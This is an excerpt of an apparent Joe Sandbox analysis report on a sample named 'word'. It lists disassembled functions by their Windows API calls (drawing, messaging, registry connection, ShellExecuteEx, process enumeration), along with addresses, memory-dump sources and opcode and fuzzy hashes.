                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                    • String ID:
                                                                    • API String ID: 4082120231-0
                                                                    • Opcode ID: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                    • Instruction ID: e2e17d079c8faeb919f1a119f9aa9df975eabc7d00289576b12f70c1741c819b
                                                                    • Opcode Fuzzy Hash: 3e823f4574af11f26be8c20bd8771cfecf2a7ea1363ae8038588c787c8c49515
                                                                    • Instruction Fuzzy Hash: BC713AB11083419FD300DF15C884E6BBBE9EFC9708F148A1EF99497351D778A906CBAA
                                                                    APIs
                                                                      • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                      • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00447195
                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                      • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                      • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                    • Ellipse.GDI32(?,?,?,00000000), ref: 00447463
                                                                    • MoveToEx.GDI32(?,?,?,00000000), ref: 00447473
                                                                    • AngleArc.GDI32(?,?,?,?,?,?), ref: 004474B6
                                                                    • LineTo.GDI32(?,?), ref: 004474BF
                                                                    • CloseFigure.GDI32(?), ref: 004474C6
                                                                    • SetPixel.GDI32(?,?,?,?), ref: 004474D6
                                                                    • Rectangle.GDI32(?,?), ref: 004474F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                    • String ID:
                                                                    • API String ID: 4082120231-0
                                                                    • Opcode ID: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                    • Instruction ID: 71053adf7dd607ae91079c2ca5de7ffea4483cc305881a9741cc2e8bc8d6f2cf
                                                                    • Opcode Fuzzy Hash: bd92991fb0a59d5160a547c0af993f50d26037df712543aebae1afc8709768cb
                                                                    • Instruction Fuzzy Hash: 55613BB51083419FD300DF55CC84E6BBBE9EBC9308F148A1EF99597351D738A906CB6A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AngleCloseEllipseFigureLineMovePixelRectangle
                                                                    • String ID:
                                                                    • API String ID: 288456094-0
                                                                    • Opcode ID: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                    • Instruction ID: d3db7697bfba14f4a3ad6627a8a5faa1010559558ae5e3f89cc6b0bd66950af4
                                                                    • Opcode Fuzzy Hash: d308d32173f93e4cd5527eec6d709d72f3e0fef6f2bd509874fda6c33d0c9603
                                                                    • Instruction Fuzzy Hash: 90514BB51082419FD300DF15CC84E6BBBE9EFC9308F14891EF99497351D734A906CB6A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                    • Instruction ID: 19c159416ad4887e81d4090d30fbb5c505c675cee05c330e2fd8e115592bd25d
                                                                    • Opcode Fuzzy Hash: d47ceab968b999e6d4944081d81f2373d9ea27f049f07d95c13b51a59d3cc885
                                                                    • Instruction Fuzzy Hash: B651C5A05487D139F7369234884ABA7BFD55F8A304F08CA4EF1E5156C3D2ECE984C769
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                    • String ID:
                                                                    • API String ID: 87235514-0
                                                                    • Opcode ID: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                    • Instruction ID: 4493abccadab05ae7d00f733e1fa63583af0c494729619d74f1516a50adc8d80
                                                                    • Opcode Fuzzy Hash: de9aba9e896a2e755c79cba499ec14fd455f1b60db9a9f79a8626ad1a28ad6a0
                                                                    • Instruction Fuzzy Hash: A951E4F05097D139F7369364884ABA7BFE46F8A304F088A4EF1D5065C2D2ACE984C769
                                                                    APIs
                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046AA77
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ConnectRegistry_wcslen
                                                                    • String ID: HH
                                                                    • API String ID: 535477410-2761332787
                                                                    • Opcode ID: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                    • Instruction ID: 7b41397762752e7dec08e47bcdb2cb2f58790b6f4670524580eb9da3090621e6
                                                                    • Opcode Fuzzy Hash: a31a44ff546351b1de52d8f34745bf25342c9426a619c9766caf2b0061db1f75
                                                                    • Instruction Fuzzy Hash: A2516D71208301AFD304EF65C981F5BB7A9BFC4704F40892EF685A7291D678E905CB6B
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00457C34
                                                                    • _memset.LIBCMT ref: 00457CE8
                                                                    • ShellExecuteExW.SHELL32(?), ref: 00457D34
                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                    • CloseHandle.KERNEL32(?), ref: 00457DDD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$CloseExecuteHandleShell_wcscpy_wcslen
                                                                    • String ID: <$@
                                                                    • API String ID: 1325244542-1426351568
                                                                    • Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                    • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                    • Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                    • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0047379B
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 004737A8
                                                                    • __wsplitpath.LIBCMT ref: 004737E1
                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                    • _wcscat.LIBCMT ref: 004737F6
                                                                    • __wcsicoll.LIBCMT ref: 00473818
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00473844
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00473852
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID:
                                                                    • API String ID: 2547909840-0
                                                                    • Opcode ID: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                    • Instruction ID: 8efa427203ffd7a45d167e3a64f6abf3f3640219bb0751621114887cb14f0fc1
                                                                    • Opcode Fuzzy Hash: 1dcf289f501924a5df592eae16a0ec0030d5246948486ec38c60cdc62178aa5b
                                                                    • Instruction Fuzzy Hash: 4751BB71544304A7D720EF61CC86FDBB3E8AF84748F00492EF58957182E775E645C7AA
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 004552B7
                                                                    • ImageList_Remove.COMCTL32(?,?,?,?), ref: 004552EB
                                                                    • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004553D3
                                                                    • DeleteObject.GDI32(?), ref: 0045564E
                                                                    • DeleteObject.GDI32(?), ref: 0045565C
                                                                    • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                    • DestroyWindow.USER32 ref: 00455678
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                    • String ID:
                                                                    • API String ID: 2354583917-0
                                                                    • Opcode ID: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                    • Instruction ID: 19c5dc8500d05a42ca126c51664c70dafe1d1a8ca3b523478e8997b137d6e309
                                                                    • Opcode Fuzzy Hash: b44580b005306b3b7f9b1dbab51831616e075f248f5ed84087b7c105bb41b1f9
                                                                    • Instruction Fuzzy Hash: 77519D30204A419FC714DF24C4A4B7A77E5FB49301F4486AEFD9ACB392DB78A849CB54
                                                                    APIs
                                                                      • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                    • GetMenu.USER32(?,?,?,00000001,?,?,?,?), ref: 004776AA
                                                                    • GetMenuItemCount.USER32(00000000), ref: 004776CC
                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 004776FB
                                                                    • _wcslen.LIBCMT ref: 0047771A
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$CountItemStringWindow_wcslen
                                                                    • String ID:
                                                                    • API String ID: 1823500076-0
                                                                    • Opcode ID: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                    • Instruction ID: 4b9e656becebfc5f52f27a1d7ad2c07a58398098864d75d3a5ce1c02cc274359
                                                                    • Opcode Fuzzy Hash: 3c1e0179b5075f45df12b398ec391808b8d2f1e7a16a5d1bec5683dd9427006f
                                                                    • Instruction Fuzzy Hash: 174117715083019FD320EF25CC45BABB3E8BF88314F10492EF55997252D7B8E9458BA9
                                                                    APIs
                                                                    • InterlockedIncrement.KERNEL32 ref: 0047247C
                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 00472491
                                                                    • Sleep.KERNEL32(0000000A), ref: 00472499
                                                                    • InterlockedIncrement.KERNEL32(004A7CAC), ref: 004724A4
                                                                    • InterlockedDecrement.KERNEL32(004A7CAC,?,?,?,?), ref: 00472599
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                    • String ID: 0vH
                                                                    • API String ID: 327565842-3662162768
                                                                    • Opcode ID: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                    • Instruction ID: 7246262c18bb701d5349304b0e2d21290bf7c9637501dd5a114e6955e8e78370
                                                                    • Opcode Fuzzy Hash: bfb173672284e31ba0a3017bb0c7d670cf276827bd066f711b3c3b49063f60eb
                                                                    • Instruction Fuzzy Hash: 9631D2329082259BD710DF28DD41A8A77A5EB95324F05483EFD08FB251DB78EC498BED
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448B16
                                                                    • GetFocus.USER32(?,00000401,?,00000000), ref: 00448B1C
                                                                    • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                    • ShowWindow.USER32(004A83D8,00000000), ref: 00448C37
                                                                    • ShowWindow.USER32(004A83D8,00000004), ref: 00448C43
                                                                    • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Enable$Show$FocusMessageSend
                                                                    • String ID:
                                                                    • API String ID: 3429747543-0
                                                                    • Opcode ID: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                    • Instruction ID: 96ed947056310062a3fa6d2350adc65d304252fdbf70c479ab88671ed4e09c2c
                                                                    • Opcode Fuzzy Hash: f5aca3f6d68f8169105ace43209457086b036621b25274999c7621d4cb9b91fc
                                                                    • Instruction Fuzzy Hash: FC31B4706443819BF7248E14C8C4BAFB7D0EB95745F04492EF981A6291DBA89845C719
                                                                    APIs
                                                                    • GetClientRect.USER32(?,?,004A83D8,?), ref: 00447997
                                                                    • GetCursorPos.USER32(?), ref: 004479A2
                                                                    • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                    • WindowFromPoint.USER32 ref: 004479FF
                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                    • String ID: X1
                                                                    • API String ID: 1822080540-2397719451
                                                                    • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                    • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                    • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                    • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 004478A7
                                                                    • TrackPopupMenuEx.USER32 ref: 004478C3
                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                    • GetCursorPos.USER32(?), ref: 00447935
                                                                    • TrackPopupMenuEx.USER32 ref: 0044795B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                    • String ID: X1
                                                                    • API String ID: 1300944170-2397719451
                                                                    • Opcode ID: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                    • Instruction ID: 600148c7f6f0e64f7aba5c2d0a58757112576a5c49d56a392ea253be37485a5b
                                                                    • Opcode Fuzzy Hash: 00aabaf84d80e4f8c92fc7d2a6c816b999107077810d41e1d32a7af9c3da8c6b
                                                                    • Instruction Fuzzy Hash: 2B31E475244204ABE214DB48DC48FABB7A5FBC9711F14491EF64483390D7B96C4BC779
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D32F
                                                                    • GetVolumeInformationW.KERNEL32 ref: 0045D3B3
                                                                    • __swprintf.LIBCMT ref: 0045D3CC
                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D416
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume__swprintf
                                                                    • String ID: %lu$HH
                                                                    • API String ID: 3164766367-3924996404
                                                                    • Opcode ID: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                    • Instruction ID: e4de0c6df68350460ad5232616e5185c9d799459bd1b640414cfcbd8d86849a8
                                                                    • Opcode Fuzzy Hash: bd20e614eacc1ec6e7ce8a240dc663141bf9142d6fc10aee8c7bf862d4d2af0b
                                                                    • Instruction Fuzzy Hash: 85314A716083019BC310EF55D941A5BB7E4FF88704F40892EFA4597292D774EA09CB9A
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450E24
                                                                    • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450E35
                                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450E43
                                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450E54
                                                                    • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450E62
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Msctls_Progress32
                                                                    • API String ID: 3850602802-3636473452
                                                                    • Opcode ID: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                    • Instruction ID: b51c377fab27852337593a8f268aff884918310fa347e0537580fa9f3b853d23
                                                                    • Opcode Fuzzy Hash: 42656bfbb5a190feb894f1e63281698c22ff60bbec02a0e57f9bf8616b6fd2a5
                                                                    • Instruction Fuzzy Hash: 2C2121712543007AE7209A65DC42F5BB3E9AFD8B24F214A0EF754B72D1C6B4F8418B58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                    • String ID:
                                                                    • API String ID: 3985565216-0
                                                                    • Opcode ID: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
                                                                    • Instruction ID: 02eb1b45cc7e926b76574f27881fb1e8d9d372094f4d7b34cf8607babd6cb63d
                                                                    • Opcode Fuzzy Hash: dc022e11ae60a508d3fee16e2099accab07c71a042b18f60c16d9d094d7ead98
